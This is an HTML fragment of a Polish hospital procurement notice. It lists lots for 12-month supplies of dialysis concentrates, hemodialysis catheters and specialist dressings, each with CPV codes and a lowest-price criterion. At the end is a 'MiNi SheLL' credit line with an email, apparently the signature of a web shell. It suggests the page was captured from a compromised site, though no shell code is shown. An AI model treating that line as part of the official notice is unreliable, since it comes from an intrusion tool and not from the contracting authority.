<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy kapsuł  z koncentratem suchym węglanowym wg opisu z zad. nr. 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.20-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> koncentraty do dializ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy koncentratów do dializ wg opisu z zad. nr. 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.15.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> cewniki naczyniowe do hemodializ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesiecy cewników naczyniowych do hemodializ wg opisu z zad. nr. 6..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> opatrunki typu Pushban.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy opatrunków typu Pushban wg opisu z zad. nr. 7..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> opatrunki specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Systematyczne dostawy przez okres 12 miesięcy opatrunków specjalistycznych wg opisu z zad. nr. 8..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com